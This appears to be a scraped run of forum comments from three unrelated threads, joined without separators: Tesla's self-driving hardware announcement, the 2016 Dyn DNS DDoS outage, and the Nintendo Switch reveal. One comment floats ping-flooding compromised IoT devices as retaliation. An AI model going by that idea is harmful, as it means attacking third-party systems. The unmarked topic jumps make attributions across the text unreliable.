So many "but what if this and that and this..." & "and yeah let's see if it can handle X & Y"

This is the iPhone 1 of self-driving cars!That's akin to saying Apple should have waited to release their phone until iPhone 7 "because of this & that & this..."

Don't we have to start somewhere??Aren't there supposed to be a big user base here who understands that it's an evolutionary process - we build the plane before we build the rocket before we shoot people into space?

Oviously the perfect self-driving car is still some way off, but I for one am thrilled this race is on!

I think what people are missing here is an understanding of how these systems are tested and deployed at scale. While I have no involvement with Tesla I do have first-hand knowledge of similar programs at tier 1 automotive suppliers.

The suppliers provide (or are looking to provide) an electronics suite to car manufacturers. The car manufacturers want the system to be safe lest they be sued out of existence. One part of that will include contractual requirements for the system to have clocked n-kilometers on the highway in full (or partial) operation. For example, one project had a requirement for car(s) with full sensor data recording and partial automation enabled for 1 million kms.

The automotive suppliers will outfit a handful of, say 2019 model year test cars with the proposed sensors in the correct place and drive them around roads and highways in the specified conditions. Outfitting the cars can be expensive with prototype hardware, collecting the resulting data is a pain, and as a result the suppliers I'm familiar with run a (relatively) small number of cars for a lot of miles to record all that data.

The point of all this is to collect sensor data for resimulation as models are developed and trained. If an exceptional event occurs, they can modify the driving model, then "replay" the new model against all prior collected data to make sure the change doesn't do something unexpected elsewhere.

This process takes a lot of time (years) to pursue in this manner. What Tesla is doing is deploying the hardware in the field, then using the deployed systems to collect data to be used for the development of the automation platform. Instead of a couple of test mules they can use every single car they sell and let you drive it around for them while they record the results. Data collection that would take years can happen in weeks. This is a brilliant shortcut to the process and it puts them a couple years in front of the competition.

More cameras. Better sonars (very short range). Better radar processing, but apparently the same old single radar at bumper height. Still no windshield-height radar. No radar scanning in elevation. No LIDAR.

Now they just have to write software smart enough to not plow into stationary vehicles on the shoulder. There are videos of three separate Tesla crashes where the Tesla plowed into a vehicle partially blocking a lane.

There have been several announcements of low-cost solid-state LIDAR units for automotive. Quantergy announced last year, but didn't ship.[1] Innoviz announced this year to ship in 2018.[2] Advanced Scientific Concepts can't get their costs down.[3] (They have a great unit that costs $100K; the Dragon spacecraft uses it during docking.) Those are all-solid-state devices. There are also some companies trying to use MEMS mirrors, like TV projectors. Eventually somebody will get 3D LIDAR technology working at a low price point, but it hasn't happened yet.

If you go to the order page of the Model S, it says for the "Full Self-Driving Hardware":

>Please note also that using a self-driving Tesla for car sharing and ride hailing for friends and family is fine, but doing so for revenue purposes will only be permissible on the Tesla Network, details of which will be released next year.

For a time, new Tesla buyers again become early adopters. But unlike traditional early adopters, who take a trade-off (on price, or features, or polish) for being first, these adopters are promised the features when they are ready.

The nay-saying around Tesla is immense, even in these early HN comments. Obviously there's some risk here, but man. Tesla is sowing the seeds of the future.

1. It is a self driving car, it is so clearly the future, I wish it existed now, it is going to be awesome (in my opinion).

2. Despite knowing about and following news about driverless cars for a while, there was something surprisingly (to me) compelling about watching the video. It's like you get a little taste of the full A to B that it can give you (door to door).

Who wants to speculate how long it will be until self-driving cars are common place in the UK? I need to know how long I have to save..!

From 00:50 to 01:10, why is the car driving in the left lane, when the right lane is clearly not turning? It's strange to see this behaviour as someone living in Germany, where you are supposed to, by default, drive in the right lane if you are not overtaking another car or there is a traffic jam...

EDIT: also, did it turn into the wrong lane at 2:25-2:30? is this a security risk?

> Teslas with new hardware will temporarily lack certain features currently available on Teslas with first-generation Autopilot hardware, including some standard safety features such as automatic emergency breaking, collision warning, lane holding and active cruise control.

Not sure what to make of this. New buyers are getting less than current owners now, but expected to get much more later?

I can't think of a precedent for this as a marketing approach in modern consumer products.

Truly impressive. I wonder if the Model 3 will also be fitted out with all the sensors and cameras. If yes, I'll definitely get one.

As a German citizen, it really bugs me that Volkswagen is incapable of this kind of innovation. I don't see their roadmap play out like they plan it, because Tesla might beat them to market hard. I fear German regulation will jump in (again) to help them against Tesla.

Currently, the German government gives out electric vehicle subsidies (~5k per car), but it is limited cars less expensive than 60k. At the moment there is very low demand for this subsidy, because everyone who goes EV wants to go Tesla.

But seriously the tech is very impressive. The journey was rather simple though, and didn't cover more difficult areas (inner city driving, heavy stop start traffic, roadblocks, road accidents and so on). I hope that Tesla test these things thoroughly because they've already got one death under their belt, it won't take many more to put people off completely.

How sure are they that this hardware revision is going to be what is required? I feel like at any point in time you can make an assumption about the hardware requirements to only discover in future that you could have actually done it with just a software update if the CPU had one more core. They'd have to be pretty sure this HW rev would meet their future demands for self-driving right ?

I get that tech companies want self-driving cars really bad because they smell billions of dollars in "disruption" but no matter how good AI gets, I have a suspicion it won't actually do better than a decent human driver can do. It's not about processing speed, it's about experience and reflexes, which granted, not everyone has.

Let's see a self-driving car win a Formula 1 race--and even that controlled racetrack environment isn't the same as the real world! It's actually harder to drive on the typical American roadways than it is to be on a track.

And yes, I am aware that AI stuff is improving exponentially or whatever, but the more I think about this, the more I think it is mostly a pipe dream to grab headlines and be a "look over here" type distraction for the purposes of raising funding.

In terms of safety, people will still lose their lives, they will just die from different kinds of car accidents than the kinds we have now.

The former head of Google's self-driving car project has said that self-driving cars are decades into the future.* Even if that's too pessimistic, nobody today knows what a self-driving car will look like, what kind of algorithms it will run, and what kind of sensors it will need to get there. I'm afraid this pronouncement is another sign that Mr. Musk is taking his investors for a ride.

From the car purchase page, it seems that they are charging an additional $13,200 (combining the addons Enhanced Autopilot and Full Self Driving capability at $7,900 and $5,300 respectively) for the full experience:

The video was too edited for me to have confidence. There was a moment at about 2:05 where I was interested to see how it handled the termination and merging of the lane -- but then we cut away before that happened. Or at 1:30 when there's no big sign post in the median, and then switching to left-rear camera, there we pass one. It's a nice narrative on the future, but it's far from proof of comprehensive functionality.

So what do these cars do when the hit a puddle of mud and it covers all the cameras. Will there be a new form of vandalism where someone puts scotch tape over/destroys the vehicles cameras and now your fancy autonomous vehicle is rendered incapacitated. Maybe this seems unlikely or ridiculous, but the dependence on cameras at points on the car that seem likely to get dirty and or damaged seems to be a risk to me.

I had hoped to see this technology occur in my lifetime, I said to myself "I hope I live to see the day" a few years ago. Here it is in 2016, obviously its just a highly controlled demo but it has connected the dots. I'm confident the technology is there and the hardest work will be overcoming legislation and politics.

But does anyone else find this bittersweet?

I had an awesome moment of pride for what Tesla and Elon have done here. The dream is now reality.

All German car manufacturers are now fitting their cars with hidden passive sensors for collecting data related to human driving with the intent to use these data for autonomous driving. Their main problem is the cost of transmission, i.e. they are considering buying mobile networks/towers and piggyback on mobile traffic. Then obviously feeding these data to huge datacenters with the projected flow of up to 2MB/s from a single car.

It was already announced before, that the hardware is included. And it was clear, that it is meant to be used for autonomous driving. And as they do not have autonomous driving yet, this is indeed just hot air... How would they know it is completed if there is no demonstration of it actually working?

I was thinking of this idea the other day when I came to an intersection where a stop sign had been hit. It was now bent in a way that faced the highway that did not have to stop. I was on a highway with no stop signs or lights for miles. What would the self driving car do in that situation? For both sides of the intersection.

Then I thought about another intersection by my old house. For years the cross street had to stop for traffic on the main street. One day I went to work, then I came home and it was all the sudden a 4-way stop. No database of stop signs could work either unless it was updated to the minute.

So, both Nvidia and Tesla are working on self-driving cars based on the sensory data mainly from cameras mounted on the car, which are then run through X number of RNNs to generate models to operate on? While Google pursues their LIDAR-approach?

What other players are operating in this space? And what's their approach?

> To make sense of all of this data, a new onboard computer with more than 40 times the computing power of the previous generation runs the new Tesla-developed neural net for vision, sonar and radar processing software.

40 times the performance of a Tegra 3 is not particularly impressive.

Also, I sincerely hope that this new faster computer doesn't also run a web browser.

To be safely aware of its surroundings, an autonomous vehicle must have two types of sensors in each direction - this setup is not safe enough.

I would also have proof of 10 million kilometers of simulated rides with no accident, and a third party organization not under the control of Tesla who creates some really tough repeatable challenges, both simulated and in the real world, that a vehicle manufacturer has to pass.

Challenges should include:

- thin wire tensioned over the street.

- the combination of super heavy rain with lighting, thick fog and people suddenly running onto the street

- passing by a soccer field and ball bounces over the street. Car should stop because it can be reasonably expected that a child will run blindly onto the street after the ball

- have obstacles that minimally invade into the minimum clearance outline of the current planned course. Car should plot an alternative course if it is possible or stop. Obstacles should appear in the last moment possible and car should always do the right thing.

- proof that the car can always detect street boundaries, any obstacle, and especially humans. It should be 100% correct or side on the safe side every time. At night, in a rain storm with super thick smog and hail. I'm not joking.

These are the minimum limits before any self-driving car should be able to drive on public roads, imho.

Will this new neural net and hardware be capable of advanced object detection?

For instance if a plastic bag or piece of cardboard rolls across the highway a human driver knows it's safe to run over without stopping. Would a system like this just see an obstacle via radar and emergency brake?

Google has been working on this problem for longer and they have access to the largest image/video datasets in the world to train their models. I wonder how google and tesla systems would compare.

It is quite impressive, but I'll honestly have a hard time getting excited about self-driving cars until I see a demo of driving at night in a snow storm (heck, even heavy rain would be nice to see) around road construction, poor signage and faint lines on the road. Believe it or not, those kinds of conditions are fairly common in places outside of California, and until we have self-driving cars that can do really well in those conditions, this is basically just a fun demo in my opinion.

I'm really not trying to downplay the hard work and technical merit of Tesla; sped-up video and opportune edits aside, it is very cool. But I can't help but feel that it's a bit like showing off (to the world) your shiny new web app that only works in IE with ActiveX installed, only if your name is "demo user", and only when the planets are in perfect alignment - or in other words, a functional prototype by anyone else's standards. It's a great achievement, but we're certainly not "there" yet - if that's what it's trying to communicate. And yes, the "Full Self-Driving Hardware" headline certainly seems to suggest that (at least) the hardware is "there" now, and that it's only a matter of software iteration to be done.

Before you respond with the typical "but those are just nitpicky details" or "this is only v1; v2 will be able to solve those things easily", let me say this: going from this to a system that can handle challenging road conditions is not just a matter of software iteration. Since poor road conditions threaten the reliability of sensor data itself, we're talking about a problem that gets increasingly more difficult. The most sophisticated software in the world can't do anything if cameras and sensors are frozen or obstructed, and when signage and lines are lacking, the software must rely on more and more human-like levels of AI inference - not just about driving, but about the complex world in general.

This is a sign of the utter commodification of hardware and the possibility that a majority of innovation in the future (with the exception of low-power wearables) lies in the realm of software and algorithms.

When this becomes real, the next question becomes "why own the car"? What's the benefit of having it sit in a parking lot for 8 hours until I'm ready to go home. Seems like the future will become more Uber-like, where I call up rides whenever I want, and don't worry about parking, maintenance, etc....

About self driving cars in general: I am very concerned that self driving cars and speed limits are going to be a very annoying issue. I can see them drive way slow in semi-complicated situations annoying all other drivers. There are also many places in the county where it's normal and seemingly expected to go 5-10mp/h over the speed limit. Of course self driving cars will stay under the posted speed limit. I hope that in the long run we will be able to innovate on how we deal with speed limits especially once the human driven cars are off the road and hopefully illegal. But till then I can see lots of road rage coming from this.

Teslas with new hardware will temporarily lack certain features currently available on Teslas with first-generation Autopilot hardware, including some standard safety features such as automatic emergency breaking, collision warning, lane holding and active cruise control

Right, so they are actually announcing that their new cars now have less automation capabilities. I can't keep track with all the "autopilot" hardware they have deployed to date, MobilEye, BOSCH Radar, own software hacks, then this completely new one..

Not to mention that they have sold thousands of cars with the same Autopilot brand and "fully autonomous soon" messaging that will now likely never get there.

Seems like Tesla is moving forward with much regard for safety nor technical advancement. Disappointed Tesla could back up and park in one motion. It also went too far forward to back up. You don't need to that much room. How is it going to handle itself on Market St when it finds a spot but the bus behind it has to go around?

BUT the car was driving itself in ideal conditions, with high visibility in all directions and amidst light traffic.

What I'm really hoping to see is a video of the car driving itself in more dangerous situations, such as in the middle of heavy rain or thick fog that limits visibility, or at night on a dangerous stretch of highway with lots of trailer trucks zooming by, or surrounded by tired angry drivers on a major holiday in a popular route with bumper-to-bumper traffic.

When self-driving cars can successfully navigate those and other similarly dangerous scenarios, we will know the technology is ready.

Hardware performance is not a problem for Level 5 autonomy - the software is. If Tesla insists on deploying full self-driving capability in the next couple of years, they will be litigated out of existence. We are a few decades away from autopilot to "understand" what it is doing. Right now it is just parroting the most common scenarios. This may be as good or slightly better than the average driver, but it still will result in many deaths, if deployed in hundreds of thousands of cars. Unless Tesla somehow shields itself from legal liability, it will be sued to oblivion.

So self-driving will be a standard feature of Model 3, not an option? Pretty cool if they can make it work. I'm skeptical that the computer (NVIDIA Drive PX 2 perhaps?) will have enough power to do it all without LIDAR.

> While this is occurring, Teslas with new hardware will temporarily lack certain features currently available on Teslas with first-generation Autopilot hardware, including some standard safety features such as automatic emergency braking, collision warning, lane holding and active cruise control.

This is very awesome and just one more step in moving towards a completely automated world. Everyone's commutes everyday is just a gold-mine of mostly unused data-points. There are solutions out there right now like Waze / Google Maps that'll redirect users around accidents. Can you imagine how crazy it'll be when our roads become even smarter based on individual users. For example, if there are people who "logged-in" to a road that enjoy driving faster, then this self-aware driving car can go in the lanes that avoid certain dangerous users.

The Jalopnik review of the video was pretty critical, essentially claiming that the test was done under the best possible conditions and this doesn't demonstrate that Tesla is getting any closer to automatic driving on more typical roads. (I don't know whether that's right or wrong, just thought it was an interesting analysis.)

They have a pretty interesting description of their radar images: "...because of how strange the world looks in radar. Photons of that wavelength travel easily through fog, dust, rain and snow, but anything metallic looks like a mirror. The radar can see people, but they appear partially translucent. Something made of wood or painted plastic, though opaque to a person, is almost as transparent as glass to radar".

So my question is, where can I find such images? Or can I buy such a radar and tinker with it myself? What wavelength are they speaking about?

I wonder how they balance their development process for the algorithms with the upgraded sensors vs the code that runs with older sensors as input. Do they maintain two different teams? Back port improvements?

1) If a self-driving car is involved in an accidental death. Is the justice system equipped to effectively hold a trial where information like logs, debugging information, etc. are discussed in court to validate whether or not there is any liability on the part of the manufacturer, considering the car is driving itself?

2) What happens in the case of bugs or system-level crashes? What is it about car software that makes it "not broken" compared to the other software we write?

Can someone speak to Tesla's approach of collecting real-world data, and Google's approach of "simulating" roads and conditions and running self-driving models on that (so technically their vehicles drive millions of miles on simulated roads).

Intuitively Tesla's approach makes more sense, but would love to hear someone with domain knowledge on how much of a difference it can actually make (after all, you need quality training data and Tesla may now have to navigate through significant more noise).

I wonder, do they upload all the camera videos taken during driving in grayscale low-res video through 4G to be computed though their neural net at Tesla ?What hardware do they have in the car to process the video, the Jetson TX1 can use up to 6 cameras or 1400 Mpix/s, but they probably use low-res output for neural net usage.I wonder what drivers think of their privacy.

"The person in the driver seat is only there for legal reasons" - how do Tesla reconcile this with the "summon" feature? How can they market the summon feature and say the Tesla could find you on the other side of the country unless it has someone in the driving seat touching the steering wheel?

Another reason we want better battery life on phones. I can imagine a scenario when your car goes and parks itself and you come looking for it without phone battery. Super cool though. Love how they are challenging such a significant and resourced industry.

I'm curious to see when cities will start changing their zoning for this new reality. The most exciting to me is elimination of parking minimums - these add a lot to the cost of building anything and take up very valuable/well located space.

Who's providing all this hardware? EIGHT surround cameras and TWELVE ultrasonic sensors: Are they building this in house too? If not, that's a lot of business to a supplier... all I could find about camera suppliers for Tesla was their former camera (tech?) supplier Mobileye.

My stance is very simple: when I can buy a car in Vancouver, BC without a driver's license I will be at the car salon door / preorder page / whatever, midnight movie release style to buy one and I won't ask about the price. Just make it happen, please.

Some of what they describe sounds like it's going to take some real adjustment before it stops being annoying and starts being useful, namely the assumption of what you want when you get in and out.

> If you dont say anything, the car will look at your calendar and take you there as the assumed destination or just home if nothing is on the calendar.

Oh boy. If you get in your car, it will just assume it should start driving somewhere more or less immediately? What if you want to sit for a few minutes?

I know, I'm taking them very literally. Just saying, though.

> When you arrive at your destination, simply step out at the entrance and your car will enter park seek mode, automatically search for a spot and park itself.

Again, what if I'm unpacking things for the car, or don't want the car to go anywhere? I don't want to have to pull out my phone and tap on something to stop it rolling away, or jump in front of it or something, or open a door.

Is this a formal model-year revision/refresh, or just a midyear 'minor revision' thing (despite being a major revision?) Are old models retrofittable? Will this hurt the resale value of existing Teslas that have the last generation hardware?

Is there an industry-standard (or governmental) safety test that these autonomous systems have to go through to evaluate their efficacy and performance in different scenarios?

>While this is occurring, Teslas with new hardware will temporarily lack certain features currently available on Teslas with first-generation Autopilot hardware, including some standard safety features such as automatic emergency breaking, collision warning, lane holding and active cruise control.

But not software and they don't even have confidence in their current implementation?

It's not surprising considering the recent announcements by the regulators, but that's quite a step.

Are the cars going to look like Google's and Uber's self driving cars, then?

I never cared that much about self driving capabilities - I like to drive myself - and I certainly don't want to shell out $35,000 for a car with what looks like a food processor or a police emergency light mounted on the rooftop.

IMHO, one of the best features of Tesla has been that they actually made EVs look like traditional cars. It might seem trivial, but many of the budding competitors still fail to do just that:

Out of curiosity, why do caching DNS resolvers, such as the DNS resolver I run on my home network, not provide an option to retain last-known-good resolutions beyond the authority-provided time to live? In such a configuration, after the TTL expiration, the resolver would attempt to refresh from the authority/upstream provider, but if that attempt fails, the response would be a more graceful failure of returning a last-known-good resolution (perhaps with a flag). This behavior would continue until an administrator-specified and potentially quite generous maximum TTL expires, after which nodes would finally see resolution failing outright.

Ideally, then, the local resolvers of the nodes and/or the UIs of applications could detect the last-known-good flag on resolution and present a UI to users ("DNS authority for this domain is unresponsive; you are visiting a last-known-good IP provided by a resolution from 8 hours ago."). But that would be a nicety, and not strictly necessary.

Is there a spectacular downside to doing so? Since the last-known-good resolution would only be used if a TTL-specified refresh failed, I don't see much downside.

I wanted to provide an update on the PagerDuty service. At this time we have been able to restore the service by migrating to our secondary DNS provider. If you are still experiencing issues reaching any pagerduty.com addresses, please flush your DNS cache. This should restore your access to the service. We are actively monitoring our service and are working to resolve any outstanding issues. We sincerely apologize for the inconvenience and thank our customers for their support and patience. Real-time updates on all incidents can be found on our status page and on Twitter at @pagerdutyops and @pagerduty. In case of outages with our regular communications channels, we will update you via email directly.

In addition you can reach out to our customer support team at support@pagerduty.com or +1 (844) 700-3889.

I'm a GitHub employee and want to let everyone know we're aware of the problems this incident is causing and are actively working to mitigate the impact.

"A global event is affecting an upstream DNS provider. GitHub services may be intermittently available at this time." is the content from our latest status update on Twitter (https://twitter.com/githubstatus/status/789452827269664769). Reposted here since some people are having problems resolving Twitter domains as well.

Name Server: ns1.p44.dynect.net Name Server: ns2.p44.dynect.net Name Server: ns3.p44.dynect.net Name Server: ns4.p44.dynect.net Name Server: sdns3.ultradns.biz Name Server: sdns3.ultradns.com Name Server: sdns3.ultradns.net Name Server: sdns3.ultradns.org

ultradns.biz:

Name Server: PDNS196.ULTRADNS.ORG Name Server: ARI.ALPHA.ARIDNS.NET.AU Name Server: ARI.BETA.ARIDNS.NET.AU Name Server: ARI.GAMMA.ARIDNS.NET.AU Name Server: ARI.DELTA.ARIDNS.NET.AU Name Server: PDNS196.ULTRADNS.NET Name Server: PDNS196.ULTRADNS.COM Name Server: PDNS196.ULTRADNS.BIZ Name Server: PDNS196.ULTRADNS.INFO Name Server: PDNS196.ULTRADNS.CO.UK

Journalist and security researcher Brian Krebs believes this is someone doing a DDoS as payback for research into questionable "DDoS mitigation services" that he and Dyn's Doug Madory did. Doug just presented his results yesterday at NANOG and Krebs believes this is payback. Read more: https://krebsonsecurity.com/2016/10/ddos-on-dyn-impacts-twit...

I'm wondering, from a regulatory perspective, what might be done to mitigate DDoS attacks in the future?

From comments made on this and other similar posts in the past, I've gathered the following:

1) Malicious traffic often uses a spoofed IP address, which is detectable by ISPs. What if ISPs were not allowed to forward such traffic?

2) There is no way for a service to exert back pressure. What if there was? e.g. send a response indicating the request was malicious (or simply unwanted due to current traffic levels), and a router along the way would refuse to send follow up requests for some time. There is HTTP status code 429, but that is entirely dependent on a well-behaved client. I'm talking about something at the packet level, enforced by every hop along the way.

3) I believe it is suspected that a substantial portion of the traffic is from compromised IoT devices. What if IoT devices were required to continually pass some sort of a health check to make other HTTP requests? This could be enforced at the hardware/firmware level (much harder to change with malware), and, say, send a signature of the currently running binary (or binaries) to a remote server which gave the thumbs up/down.

"digikey.com", the big electronic part distributor, is currently inaccessible. DNS lookups are failing with SERVFAIL. Even the Google DNS server (8.8.8.8) can't resolve that domain. Their DNS servers are "ns1.p10.dynect.net" through "ns4.p10.dynect.net", so it's a Dyn problem.

This will cause supply-chain disruption for manufacturers using DigiKey for just-in-time supply.

I've been singing the praise of AWS Route53 for a long time, they up and running. I can't believe major multi-million dollar companies (Twitter, GitHub, Soundcloud, Pagerduty) would not run a mix of multiple DNS providers.

Also what is happening is a cascade effect, where a 3rd party being down effects others.

Is it time for everyone to actually start using secondary name servers/DNS resolvers too from a different provider from primary? DNS _is_ built for this, for the very purpose of handling failure of the primary resolver, isn't it? Just most people don't seem to do it -- including major players?

Seems to be impacting POPs in US East most severly. We use Ripe Atlas to assess the impact of DNS outages, and in the past hour have measured about 50-60% recursive query failure from a few hundred probes in that region: https://cloudharmony.com/status-for-dyn

Any quick script to see if a given domain ultimately resolves to them? My SaaS company has a lot of custom domains from whatever DNS servers pointed at us and I'd like to be able to tell people whether it's our fault or not.

Let's assume, that foreign countries such as Russia or China would be trying to sabotage our elections on Nov 8th night. What are the severe economic and political backlash that we can deal with if we cut off the traffic coming in from those region (not in a "we control the internet" kinda way)? I am sure they already have nodes operating within the USA. A lot of major tech companies use CDNs that can still serve traffic globally to the consumers of those countries. Even better, how about we regulate and slow down all of incoming traffic for say half day on election day? Is it even possible?

In (well, after) attacks like this, and really any other massive DDOS, shouldn't it be possible to identify potential botnets and try to take them out (notify their owners that they're being used, notify their hosting providers, etc) so that they can't be used again in the future?

Quick question for you all. Just two days ago I registered two domain names at dynu (not dyn). Early this morning I a cold call from a company in India who knew the domain names and my phone number and was calling to ask if I wanted them to help me manage my website cheaply. Also, this morning I got a spam text from someone who claimed to by godaddy offering the same thing. Now I protect my number really well so this is the first time in 5+ years that I ever got spam texts or calls to my number. Do you think Dynu was also hacked?! Or maybe Dynu sells client numbers (which is how the guy in India claimed to get my number) and it was just by random chance that this happened at the same time as the Dyn hack.

I've been having the same problem accessing github in particular. Just for fun, I opened the Opera browser and activated the built-in VPN. That got everything going again. At least for browsing, not so useful for my git pulls and pushes.

Can someone explain why this is so bad? I think the internet handled the downtime of Dyn pretty great, not reaching github wasn't exactly pleasing, but i added the ip temporary to /etc/hosts and the problem was solved. Isn't the best strategy to accept that attacks will continue and systems may go down and design for resilience? If so this attack can serve as a warning and as a check that we can handle these types of attacks. I am a bit exaggerating, but i would imagine that constant attacks keep the internet resilient and healthy. An unchallenged internet may be the greater risk.

The DDoS problems, at least those not related to spoofing IPs, could be curtailed if we provide a strong incentive to the ISPs to work on it.

Let's hold the ISPs financially liable for the harmful traffic that comes from their network. If a client reports a harmful IP to the ISP, every bit of subsequent traffic sent from that IP to this client carries a penalty.

Yeah, I know, routing tables are small, yada yada. If we put thumbscrews to the ISPs they will find a way to block a few thousands IPs of the typical botnet, even it requires buying new switches from Cisco & co.

Anyone know any details of what the attack looks like ? I had a quick look in my (albeit small) network to look for odd flows going to their ASN33517, but didnt see much that looked odd on first glance...

While my app isn't resolved using DYN, we are relying on APIs on our EC2 backend that use their DNS. Is there a Linux DNS caching server that will serve from a local cache primarily, and do lookups in the background instead to update the local cache? During the period DYN was down, it would've continued severing from the local cache and retried the background lookups, keeping my app up. I can also see it improving performance as my servers currently do lookups to the EC2 DNS on each http request...

No idea if this would work, but could people theoretically just ping flood the IOT devices involved to mitigate the attack?

They run some sort of web server since most devices provide some web interface, so clearly there's a port open which could be hit if the IP is know, and with the shoddy security in these devices I'd wonder if their local (likely low performance) hardware would be susceptible to something as simple as a ping flood attack.

How can I, a proficient web developer but one with little experience working directly with its underlying infrastructure, help in whatever effort is being down to thwart this and related attacks? I feel a moral obligation to help as these attacks seem a grave threat to our economy and could cause unrest given the current political climate. Thanks.

https://cloudharmony.com/status-for-dyn is now (12:43pm EDT) showing Dyn's "US East" and "US West" centers as being down. Anyone know anything about this Cloudharmony service? How often does it update? and what is it monitoring?

Hmm... Seems to be quite widespread. Some of our Amazon AWS services (located in the US) that rely on SQS are reporting critical errors. Intercom.io is also down at present, which we use for support for our web apps. Not looking very good from here (in Australia).

Why does it always have to be a "Nation State", have been hanging out with 17 year old's that knew far more about DNS configs than a room of "Cyber-Security-Professisonals", they were clueless, these kids could run circles around them.

USA cyber defenses are NOT up to the task of defending our critical electronic infrastructure. Letting every company that runs critical services decide their own security posture is not scalable and has left us vulnerable. While no one is getting hurt, we are taking cyber missile hits from our enemies and eventually the damage will be worse. Other countries with more central controls will be less vulnerable than we are to crippling infrastructure take downs.

It is so reassuring to see Nintendo create a modern gaming machine that doesn't try to be a living room hub or an iPad competitor. Going entirely by the video alone, every single design decision has been made with a clear focus on gaming. The simple docking action for transitioning it to the TV, the versatility and portability of the controllers, the reasonable size, etc all combine to make this (again, judging entirely from the video) a focused, confident release that finally embraces the changing way people play games.

Besides an original Gameboy (which I loved), I've never owned a Nintendo console. After seeing this trailer, it is an instant buy for me in March.

The only thing I want to know more about is the online store. From what I understand, Nintendo's eStore has a lot of shortcomings in a lot of weird areas. I hope they address those. I have an Xbox One and about 25 games, all of which were purchased digitally. I'm not sure I could go back to physical versions of games.

Very clever. Anchor for home, and again trying for the mobile area where their creativity really worked (3DS). I'll be curious in the system specs and the decisions they made - such as having that apparent card slot. Hooray for the headphone jack.

I'll never understand the marketing motivation to show a bunch of people getting together for a social gathering and togetherness, then cram together to watch / play on something with a screen the size of a hardback novel.

The most interesting thing to me is a design decision that combines an important aspect of the original NES with an important aspect of all of Nintendo's portable machines since the DS: a reduced barrier to entry for multiple people to play. In 1989, every NES sold came with two controllers out of the box. Similarly, every portable Nintendo system since the original DS has supported Download Play, which requires each player to have their own console, but only a single copy of a game.

It looks like you'll be able to use the standard Switch controller as two "half controllers." Sure, you get limited functionality, but one person with one standard (portable!) console and one multiplayer game like Mario Kart can say those all-important words to anyone, anytime: "Want to play?"

So this is a good usage model, but I'm not sure people want to carry yet another tablet just for gaming. The only way I can see this thing taking off is if it can fall back into an Android tablet mode for web browsing, e-mail, etc. But as a portable gaming console, it seems pretty boss. I'm curious what the hardware specs are and how they differ from other tablets on the market.

Because if it can't do everything else my current tablet can, I'm gonna have to carry a tablet AND this thing. Done right, Nintendo can make this thing the first real challenger to the iPad for mass-market adoption. But they've gotta treat it as a first-party Android device and get updates out ASAP and not muck with the interface too much. I'm willing to bet they could work out a rev-share agreement with Google on the Google Play store and Google Play Apps (and keeping their own Nintendo licensing scheme).

But let's not kid ourselves here: Nintendo is a Japanese company and it operates like one. That means they'll try to own the entire value chain and miss out on any network effects, while simultaneously moving themselves from a market with a 5-10 year refresh cycle to one with a 2-3 year refresh cycle. While it means they could sell more tablets to repeat customers, it also means that they have less time to be patient for success (as happened with the Wii and WiiU) since it also increases customer churn. Network effects and platform lock-in are a lot more important when the refresh cycle is shorter, because there are more opportunities for your customers to jump off the train.

I wish Nintendo luck, and I think that this is a good usage model. But I'm not convinced it's compelling enough to displace the tablets that people are already carrying around with them unless it can also duplicate the capability of those devices.

Nintendo has been trying to blend mobile and console gaming since the Gamecube (anyone else remember the GBA link??). I think they've finally succeeded in a way that can make the transition between the two seamless.

In a space currently dominated by two nearly-identical competitors (XBONE and PS4), I think Nintendo has the opportunity to capture a large portion of the market.

This is a pretty brilliant move in concept. While phones and tablets have encroached on the handheld gaming space, the DS is still a huge success and where Nintendo has continued to dominate the market.

As a parent, I have 4 of the current gen DS systems. One for myself and one for each of my three children.

Nintendo has really struggled to stay relevant in the console space though as seen by the Wii U's underwhelming sales.

If this device is priced right and can continue on their virtual handheld monopoly then they become a sort of defacto console system for the masses. For the first time in ages I'm curious to see what is going to happen with Nintendo.

I'm quite excited by this. The video was a bit lengthy but it demonstrated the concept quite well.

Glimpses of Mario, what appeared to be Skyrim, too - more third party support this time perhaps?

I'm most interested to see the price and the spec of the machine. Xbox One and PS4 seem to have become more homogenised in terms of architecture than the last generation of consoles (PS3 was especially weird), if the Switch follows suit it would hopefully encourage more third party support. Assuming the power is there.

This looks amazing - nice form factor for easy use on the go (demonstrated in many ways in the video, including on airplanes), but still letting you have a classic game experience. It shows smart usage of now standard wireless tech and highly portable & fast storage.

It's amazing how slow game consoles change minus beefed up computing capabilities, and while Nintendo has had some hit or misses, this shift looks like a vastly superior improvement over the initial ideas brought forth by the Wii U.

Very promising. I like how haptic it is. Part of the magic of old Nintendo was the feeling of slotting in a cartridge, and handling a well-designed device and controller. They will not go back to cartriges obviously, but it seems like they put a lot of thought into this... like car engineers do when the have the doors make a specific sound when they close.

Price point: How much is this going to cost per unit? I'd imagine it's going to be much cheaper than the other current gen consoles

Battery life: If it doesn't get more than 1-2 hours, or else come with some way to extend the battery life via an accessory, it will be kinda underwhelming.

That being said, this is a very intriguing idea, and is a good focus on an easy to understand concept. Funny image: Two people playing on a Switch with the controllers snapped onto it, doing some top down game like air hockey or something.

Of the featured use cases, gaming on a plane is the only one that made a ton of sense to me. (Binging on Stardew Valley on a laptop during my last trip to China actually helped a lot with jet lag recovery.) The other featured cases, I'm not so sure. I definitely miss the days of my youth when my friends and I huddled around a TV split four ways. But I also don't see us returning to gaming together in person either. The most bizarre use case featured is for esports--I see no advantage to using the Nintendo Switch versus a more powerful console or PC in competitive gaming.

As a piece of hardware, this looks really cool and innovative. But I don't actually know if the product-market fit is there.

It's perfect. It was the obvious direction putting together the ideas that the Razer Edge and various snap-on-phone gamepads and the controllers of the Wii and the Wii-U implied, as well as Nintendo's attempts to create input-parity with the Wii-U and the DS by having them share the same "2 screens, one is touch" layout.

Not really relevant to anything, but I'm so grateful the movie includes the guy on the plane playing the Switch while ACTUALLY WEARING HEADPHONES. People who play videogames (or movies) on planes while piping audio through the speaker for everyone to "enjoy" should be force-ejected through some kind of special chute.

You know, I always thought the idea of a hybrid console/handheld was a terrible idea. I expect that mobile considerations are going to make it graphically underwhelming compared to the next Xbox and PlayStations. I also figure that graphical considerations for TV play are going to make it eat battery. We'll see if the jack of all trades is master is any.

But, on the other hand, Nintendo's games are just plain fun. I didn't buy a Wii U because I didn't want that giant tablet controller and its charging stand taking up space on my coffee table, but every time I saw Splatoon I wished I had room for it.

I just don't have faith in Nintendo anymore, they have a track record now of so many failed consoles and disappointments, lack of third party support, even the new Zelda doesn't get me that excited (and I've been a die hard fan for years, playing Ocarina of Time as a kid made me want to learn how to make games). We'll see how this one turns out.

Looks really cool. Too bad its not out in time for christmas. The thing would sell like crazy this year.

